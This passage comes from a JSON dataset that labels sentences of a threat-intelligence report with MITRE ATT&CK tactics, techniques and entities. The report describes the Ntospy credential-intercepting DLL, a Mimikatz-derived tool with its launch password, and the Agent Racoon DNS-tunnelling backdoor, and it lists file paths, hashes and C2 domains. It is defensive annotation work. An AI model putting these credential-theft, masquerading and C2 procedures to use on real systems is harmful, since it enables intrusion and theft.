unique features.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p4-s32-ebe67b", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 32, "context_before": "The threat actor’s implementation of this technique has some unique features.", "sentence_text": "They created different versions of the Ntospy malware over the time frame we observed.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": null, "procedure": "The attacker develops multiple versions of the malware.", "entities": [ { "text": "created different versions of the Ntospy malware", "start": 5, "end": 53, "label": "Action" }, { "text": "Ntospy malware", "start": 39, "end": 53, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p4-s33-8a4c2a", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 33, "context_before": "They created different versions of the Ntospy malware over the time frame we observed.", "sentence_text": "They all share similarities, such as the following:\nUsing filenames with Microsoft patch patterns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p4-s35-87b3f6", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 35, "context_before": ".msu", "sentence_text": "extensions pretending to be Microsoft Update Package files to store the received credentials in cleartext.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p4-s36-6eb8c1", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 36, "context_before": "extensions pretending to be Microsoft Update Package files to store the received credentials in cleartext.", "sentence_text": "RichPE header hashes that link different samples to the same compilation environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p4-s37-d21d05", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 37, "context_before": "RichPE header hashes that link different samples to the same compilation environment.", "sentence_text": "To install the DLL module, the threat actor registers a new Network Provider called credman.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "Register a malicious Network Provider to install a DLL module for credential interception and persistence.", "entities": [ { "text": "the threat actor", "start": 27, "end": 43, "label": "ThreatActor" }, { "text": "registers a new Network Provider called credman", "start": 44, "end": 91, "label": "Action" }, { "text": "DLL module", "start": 15, "end": 25, "label": "MalwareTool" }, { "text": "Network Provider", "start": 60, "end": 76, "label": "MalwareTool" }, { "text": "credman", "start": 84, "end": 91, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p4-s38-ad5c78", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 38, "context_before": "To install the DLL module, the threat actor registers a new Network Provider called credman.", "sentence_text": "They do so by using an installation script found at C:\\Windows\\Temp\\install.bat that installs the Network Provider by using reg.exe.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" }, { "id": "T1112", "name": "Modify Registry" } ], "procedure": "Use a batch installation script to register a Network Provider via reg.exe, modifying the system to enable credential interception and persistence.", "entities": [ { "text": "using an installation script", "start": 14, "end": 42, "label": "Action" }, { "text": "installs the Network Provider by using reg.exe", "start": 85, "end": 131, "label": "Action" }, { "text": "C:\\Windows\\Temp\\install.bat", "start": 52, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "reg.exe", "start": 124, "end": 131, "label": "MalwareTool" }, { "text": "Network Provider", "start": 98, "end": 114, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p4-s39-0c017c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 39, "context_before": "They do so by using an installation script found at C:\\Windows\\Temp\\install.bat that installs the Network Provider by using reg.exe.", "sentence_text": "The malware then sets the DLL module path by pointing to the malicious DLL module c:\\windows\\system32\\ntoskrnl.dll.\nbelonging to the same malware family.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" }, { "id": "T1112", "name": "Modify Registry" } ], "procedure": "Configure the DLL module path to point to a malicious DLL within the system directory to enable credential interception and persistence.", "entities": [ { "text": "The malware", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "sets the DLL module path", "start": 17, "end": 41, "label": "Action" }, { "text": "pointing to the malicious DLL module", "start": 45, "end": 81, "label": "Action" }, { "text": "c:\\windows\\system32\\ntoskrnl.dll", "start": 82, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "malicious DLL module", "start": 61, "end": 81, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p4-s40-b8d508", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 40, "context_before": "The malware then sets the DLL module path by pointing to the malicious DLL module c:\\windows\\system32\\ntoskrnl.dll.\nbelonging to the same malware family.", "sentence_text": "The image also illustrates that there are overlaps on the RichPE header hash as well as the PE sections of the samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p5-s42-2bff77", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 5, "sentence_id": 42, "context_before": "4/22", "sentence_text": "In the group of samples with the same RichPE header hash, we saw that they had been compiled using the same environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p5-s43-1f348c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 5, "sentence_id": 43, "context_before": "In the group of samples with the same RichPE header hash, we saw that they had been compiled using the same environment.", "sentence_text": "Other samples of the malware family have been compiled on different environments or even tweaked to avoid overlapping.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p5-s44-a25c84", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 5, "sentence_id": 44, "context_before": "Other samples of the malware family have been compiled on different environments or even tweaked to avoid overlapping.", "sentence_text": "The samples that don’t share the same build environment are actually similar in behavior, but they have some differences in implementation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p5-s45-a3d191", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 5, "sentence_id": 45, "context_before": "The samples that don’t share the same build environment are actually similar in behavior, but they have some differences in implementation.", "sentence_text": "For instance, some of the malware samples contain the file path used to store the credentials hard-coded in plain text.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p5-s46-ec1ff2", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 5, "sentence_id": 46, "context_before": "For instance, some of the malware samples contain the file path used to store the credentials hard-coded in plain text.", "sentence_text": "Figures 3 and 4 show how others use an encrypted file path and stack strings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p6-s48-80f39c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 6, "sentence_id": 48, "context_before": "5/22", "sentence_text": "Decrypting the file path at runtime shows that the versions using an encrypted file path also use the same file path pattern, as shown in Figure 5.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p6-s49-a68cc5", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 6, "sentence_id": 49, "context_before": "Decrypting the file path at runtime shows that the versions using an encrypted file path also use the same file path pattern, as shown in Figure 5.", "sentence_text": "All the DLL modules we identified use the same file path pattern, abusing the .msu file extension to masquerade as a Microsoft Update Package.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p6-s50-72141f", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 6, "sentence_id": 50, "context_before": "All the DLL modules we identified use the same file path pattern, abusing the .msu file extension to masquerade as a Microsoft Update Package.", "sentence_text": "The following paths are used by the malware samples:\nc:/programdata/microsoft/~ntuserdata.msu\nc:/programdata/package cache/windows10.0-kb5000736-x64.msu\nc:/programdata/package cache/windows10.0-kb5009543-x64.msu\nc:/programdata/packag~1/windows 6.1-kb4537803.msu\nAlso, the DLL files are stored in the following file paths:\nC:\\Windows\\System32\\ntoskrnl.dll\nC:\\Windows\\Temp\\ntoskrnl.dll\nC:\\Windows\\Temp\\ntos.dll\n6/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p7-s51-8a52c9", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 51, "context_before": "The following paths are used by the malware samples:\nc:/programdata/microsoft/~ntuserdata.msu\nc:/programdata/package cache/windows10.0-kb5000736-x64.msu\nc:/programdata/package cache/windows10.0-kb5009543-x64.msu\nc:/programdata/packag~1/windows 6.1-kb4537803.msu\nAlso, the DLL files are stored in the following file paths:\nC:\\Windows\\System32\\ntoskrnl.dll\nC:\\Windows\\Temp\\ntoskrnl.dll\nC:\\Windows\\Temp\\ntos.dll\n6/22", "sentence_text": "While the first file path is the one used to actually install the Network Provider module, the Temp directory is the working directory used by the threat actor to temporarily store the DLL modules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p7-s52-c30c00", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 52, "context_before": "While the first file path is the one used to actually install the Network Provider module, the Temp directory is the working directory used by the threat actor to temporarily store the DLL modules.", "sentence_text": "As shown in the file paths above, the threat actor used Windows binary name patterns (based on the Windows system file named ntoskrnl.exe) in an attempt to trick victims and analysts into overlooking the malicious DLL component.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Threat actor uses Windows system-like filenames (e.g., ntoskrnl.exe) to disguise malicious DLL components", "entities": [ { "text": "the threat actor", "start": 34, "end": 50, "label": "ThreatActor" }, { "text": "ntoskrnl.exe", "start": 125, "end": 137, "label": "MalwareTool" }, { "text": "used Windows binary name patterns (based on the Windows system file named ntoskrnl.exe) in an attempt to trick victims and analysts into overlooking the malicious DLL component", "start": 51, "end": 227, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p7-s53-63e809", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 53, "context_before": "As shown in the file paths above, the threat actor used Windows binary name patterns (based on the Windows system file named ntoskrnl.exe) in an attempt to trick victims and analysts into overlooking the malicious DLL component.", "sentence_text": "The first activity is identified with the malware sample with the file hash SHA256 bcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p7-s54-d9a225", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 54, "context_before": "The first activity is identified with the malware sample with the file hash SHA256 bcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df.", "sentence_text": "The tool is a reduced version of Mimikatz, which needs to be given a password through the command line to run:\n1 C:\\temp\\update.exe 1dsfjlosdf23dsfdfr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p7-s55-447cbd", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 55, "context_before": "The tool is a reduced version of Mimikatz, which needs to be given a password through the command line to run:\n1 C:\\temp\\update.exe 1dsfjlosdf23dsfdfr", "sentence_text": "When the binary is executed, it takes the command-line argument as a decryption key to decrypt the actual payload using a stream cipher.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Execute the binary, use a command-line argument as a key, and decrypt the payload with a stream cipher before execution.", "entities": [ { "text": "the binary is executed", "start": 5, "end": 27, "label": "Action" }, { "text": "takes the command-line argument as a decryption key", "start": 32, "end": 83, "label": "Action" }, { "text": "decrypt the actual payload using a stream cipher", "start": 87, "end": 135, "label": "Action" }, { "text": "command-line argument", "start": 42, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "the actual payload", "start": 95, "end": 113, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p7-s56-e34422", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 56, "context_before": "When the binary is executed, it takes the command-line argument as a decryption key to decrypt the actual payload using a stream cipher.", "sentence_text": "Before executing the decrypted payload, the binary verifies that the payload has been successfully decrypted with the right key by performing an integrity check.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p7-s57-f0fa5c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 7, "sentence_id": 57, "context_before": "Before executing the decrypted payload, the binary verifies that the payload has been successfully decrypted with the right key by performing an integrity check.", "sentence_text": "This check is done by comparing the MD5 hash of the decrypted payload with the hard-coded value b855dfde7f778f99a3724802715a0baa, as shown in the code snippet in Figure 6.\n7/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p8-s58-b037c0", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 8, "sentence_id": 58, "context_before": "This check is done by comparing the MD5 hash of the decrypted payload with the hard-coded value b855dfde7f778f99a3724802715a0baa, as shown in the code snippet in Figure 6.\n7/22", "sentence_text": "When executed properly, the tool dumps the credentials to the file path C:\\Windows\\Temp\\KB200812134.txt.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "Tool dumps credentials to a file at C:\\Windows\\Temp\\KB200812134.txt", "entities": [ { "text": "the tool", "start": 24, "end": 32, "label": "MalwareTool" }, { "text": "dumps the credentials to the file path C:\\Windows\\Temp\\KB200812134.txt", "start": 33, "end": 103, "label": "Action" }, { "text": "C:\\Windows\\Temp\\KB200812134.txt", "start": 72, "end": 103, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-15_aptnotes_report-p8-s59-b574cc", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 8, "sentence_id": 59, "context_before": "When executed properly, the tool dumps the credentials to the file path C:\\Windows\\Temp\\KB200812134.txt.", "sentence_text": "This choice of filename is another attempt by the threat actors to masquerade as a Microsoft update.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Threat actors use a filename to masquerade as a Microsoft update", "entities": [ { "text": "threat actors", "start": 50, "end": 63, "label": "ThreatActor" }, { "text": "masquerade as a Microsoft update", "start": 67, "end": 99, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p8-s60-2f3e36", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 8, "sentence_id": 60, "context_before": "This choice of filename is another attempt by the threat actors to masquerade as a Microsoft update.", "sentence_text": "The Mimilite sample was found at C:\\temp\\update.exe with the file hash SHA256 3490ba26a75b6fb295256d077e0dbc13e4e32f9fd4e91fb35692dbf64c923c98.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p8-s61-e5cd11", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 8, "sentence_id": 61, "context_before": "The Mimilite sample was found at C:\\temp\\update.exe with the file hash SHA256 3490ba26a75b6fb295256d077e0dbc13e4e32f9fd4e91fb35692dbf64c923c98.", "sentence_text": "What we find interesting is that according to VirusTotal, this sample has been uploaded and discovered in the wild using the following path and filename:\n1 C:\\restrict\\analysis\\apt_sorted\\attack_case\\[REDACTED_LOCATION]\\[REDACTED_COU\n3 update.exe\nThe elements of this path might suggest that the same binary has been involved in some sort of research that the uploader believed was linked with nation-state actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p8-s62-bb8aea", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 8, "sentence_id": 62, "context_before": "What we find interesting is that according to VirusTotal, this sample has been uploaded and discovered in the wild using the following path and filename:\n1 C:\\restrict\\analysis\\apt_sorted\\attack_case\\[REDACTED_LOCATION]\\[REDACTED_COU\n3 update.exe\nThe elements of this path might suggest that the same binary has been involved in some sort of research that the uploader believed was linked with nation-state actors.", "sentence_text": "Agent Racoon Backdoor 8/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p9-s63-fdc1d5", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 9, "sentence_id": 63, "context_before": "Agent Racoon Backdoor 8/22", "sentence_text": "The Agent Racoon malware family is built to provide backdoor capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p9-s64-2712cb", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 9, "sentence_id": 64, "context_before": "The Agent Racoon malware family is built to provide backdoor capabilities.", "sentence_text": "It is written using the .NET framework, and leverages DNS to establish a covert channel with the C2 server.\nwithin the code of the identified samples, as shown in Figure 7.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p9-s65-b2a941", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 9, "sentence_id": 65, "context_before": "It is written using the .NET framework, and leverages DNS to establish a covert channel with the C2 server.\nwithin the code of the identified samples, as shown in Figure 7.", "sentence_text": "When executed, the threat has some predefined settings such as:\nThe base domain used to create the DNS covert channel A unique key per sample, used as a seed to generate an encryption password to encrypt the DNS communication A fallback DNS server if no DNS server can be read from the compromised system All the C2 domains identified fulfill the same base pattern, with unique values for the four character identifier across different samples:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p9-s66-979ee1", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 9, "sentence_id": 66, "context_before": "When executed, the threat has some predefined settings such as:\nThe base domain used to create the DNS covert channel A unique key per sample, used as a seed to generate an encryption password to encrypt the DNS communication A fallback DNS server if no DNS server can be read from the compromised system All the C2 domains identified fulfill the same base pattern, with unique values for the four character identifier across different samples:", "sentence_text": "[4 characters].telemetry.[domain].com\nThe value of Program.dns_ip is different for each sample found, which could indicate that the threat actor is building the binary with specific settings gathered from the targeted environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p10-s68-b43d16", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 10, "sentence_id": 68, "context_before": "9/22", "sentence_text": "With that pattern, the threat communicates with the C2 server by adding additional subdomains to build the DNS query.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Threat communicates with a C2 server by generating DNS queries using additional subdomains", "entities": [ { "text": "the threat", "start": 19, "end": 29, "label": "ThreatActor" }, { "text": "C2 server", "start": 52, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "DNS query", "start": 107, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "communicates with the C2 server by adding additional subdomains to build the DNS query", "start": 30, "end": 116, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p10-s69-c4a910", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 10, "sentence_id": 69, "context_before": "With that pattern, the threat communicates with the C2 server by adding additional subdomains to build the DNS query.", "sentence_text": "It uses Internationalizing Domain Names for Applications’ (IDNA) domain names with Punycode encoding.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p10-s70-6e1c93", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 10, "sentence_id": 70, "context_before": "It uses Internationalizing Domain Names for Applications’ (IDNA) domain names with Punycode encoding.", "sentence_text": "This encoding type is a representation of Unicode values over the ASCII encoding for internet hostnames.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p10-s71-4f95b5", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 10, "sentence_id": 71, "context_before": "This encoding type is a representation of Unicode values over the ASCII encoding for internet hostnames.", "sentence_text": "The domain names follow the pattern below:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p11-s72-b5c530", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 11, "sentence_id": 72, "context_before": "The domain names follow the pattern below:", "sentence_text": "To manage the communication with the C2 server, the malware uses a communication loop shown in Figure 10.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Malware maintains communication with a C2 server using a communication loop mechanism", "entities": [ { "text": "the malware", "start": 48, "end": 59, "label": "MalwareTool" }, { "text": "C2 server", "start": 37, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "uses a communication loop", "start": 60, "end": 85, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p11-s73-76bf62", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 11, "sentence_id": 73, "context_before": "To manage the communication with the C2 server, the malware uses a communication loop shown in Figure 10.", "sentence_text": "The following are some main features of the communication loop above:\nThe communication loop finishes when the answer xn--cc is received from the C2 server, or a communication error occurs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s75-1dba44", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 75, "context_before": "11/22", "sentence_text": "The randomized delay between messages can have multiple reasons:\nTo avoid network spikes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s76-2c2e17", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 76, "context_before": "The randomized delay between messages can have multiple reasons:\nTo avoid network spikes.", "sentence_text": "To avoid potential network congestion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s77-78780a", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 77, "context_before": "To avoid potential network congestion.", "sentence_text": "To provide randomness as an attempt to avoid network beaconing detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s78-c54430", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 78, "context_before": "To provide randomness as an attempt to avoid network beaconing detection.", "sentence_text": "The encryption of all the communication messages through Program.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s81-f00407", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 81, "context_before": "RC.", "sentence_text": "The encryption routine implements a stream cipher that takes the initial unique key per sample Program.key (this.defaultkey), as shown in Figure 11.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s82-9e6c1e", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 82, "context_before": "The encryption routine implements a stream cipher that takes the initial unique key per sample Program.key (this.defaultkey), as shown in Figure 11.", "sentence_text": "It then creates a 1-byte encryption key to later encrypt the message with an XOR.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p12-s83-d77d8e", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 12, "sentence_id": 83, "context_before": "It then creates a 1-byte encryption key to later encrypt the message with an XOR.", "sentence_text": "Depending on the length of the message sent to the C2 server, different subdomains are added to the query, as shown in the code snippet in Figure 12.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p13-s86-4beda9", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 13, "sentence_id": 86, "context_before": "The this.", "sentence_text": "Rand() component of the fully qualified domain name (FQDN) build is intended to avoid caching and ensure the request reaches out to the C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p13-s87-3b29b4", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 13, "sentence_id": 87, "context_before": "Rand() component of the fully qualified domain name (FQDN) build is intended to avoid caching and ensure the request reaches out to the C2 server.", "sentence_text": "Agent Racoon provides the following backdoor functionality:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p13-s88-803806", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 13, "sentence_id": 88, "context_before": "Agent Racoon provides the following backdoor functionality:", "sentence_text": "Command execution\nFile uploading\nFile downloading\nAlthough Agent Racoon does not provide any sort of persistence mechanism by itself, during the activity we observed, the threat was executed by using scheduled tasks.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Agent Racoon malware is executed via scheduled tasks on the compromised system", "entities": [ { "text": "Agent Racoon", "start": 59, "end": 71, "label": "MalwareTool" }, { "text": "the threat", "start": 167, "end": 177, "label": "ThreatActor" }, { "text": "was executed by using scheduled tasks", "start": 178, "end": 215, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p13-s89-3594a9", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 13, "sentence_id": 89, "context_before": "Command execution\nFile uploading\nFile downloading\nAlthough Agent Racoon does not provide any sort of persistence mechanism by itself, during the activity we observed, the threat was executed by using scheduled tasks.", "sentence_text": "telemetry.geoinfocdn[.]com, as shown in Figure 13.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p14-s90-bce468", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 14, "sentence_id": 90, "context_before": "telemetry.geoinfocdn[.]com, as shown in Figure 13.", "sentence_text": "Two samples of the malware family were uploaded to VirusTotal from Egypt and Thailand in September 2022 and July 2022 with the following SHA256 hashes:\n3a2d0e5e4bfd6db9c45f094a638d1f1b9d07110b9f6eb8874b75d968401ad69c\ndee7321085737da53646b1f2d58838ece97c81e3f2319a29f7629d62395dbfd1\nThese two samples used the same subdomain patterns, but this time the domain used for C2 was telemetry.geostatcdn[.]com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p14-s91-e800d2", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 14, "sentence_id": 91, "context_before": "Two samples of the malware family were uploaded to VirusTotal from Egypt and Thailand in September 2022 and July 2022 with the following SHA256 hashes:\n3a2d0e5e4bfd6db9c45f094a638d1f1b9d07110b9f6eb8874b75d968401ad69c\ndee7321085737da53646b1f2d58838ece97c81e3f2319a29f7629d62395dbfd1\nThese two samples used the same subdomain patterns, but this time the domain used for C2 was telemetry.geostatcdn[.]com.", "sentence_text": "Threat actors performed the following activities regarding this domain on the dates shown:\nRegistered:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p14-s92-0383ea", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 14, "sentence_id": 92, "context_before": "Threat actors performed the following activities regarding this domain on the dates shown:\nRegistered:", "sentence_text": "2021/08/18 UTC Expired: 2022/08/27 UTC using different C2 domain names and file paths since 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p15-s94-0a11bf", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 15, "sentence_id": 94, "context_before": "14/22", "sentence_text": "The threat actor tried to disguise the Agent Racoon binary as Google Update and MS OneDrive Updater binaries.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Threat actor disguises the Agent Racoon malware binary as legitimate software (Google Update and OneDrive Updater) to evade detection", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "Agent Racoon binary", "start": 39, "end": 58, "label": "MalwareTool" }, { "text": "tried to disguise the Agent Racoon binary as Google Update and MS OneDrive Updater binaries", "start": 17, "end": 108, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p15-s95-e10a3f", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 15, "sentence_id": 95, "context_before": "The threat actor tried to disguise the Agent Racoon binary as Google Update and MS OneDrive Updater binaries.", "sentence_text": "The malware developers made small modifications to the source code in an attempt to evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ 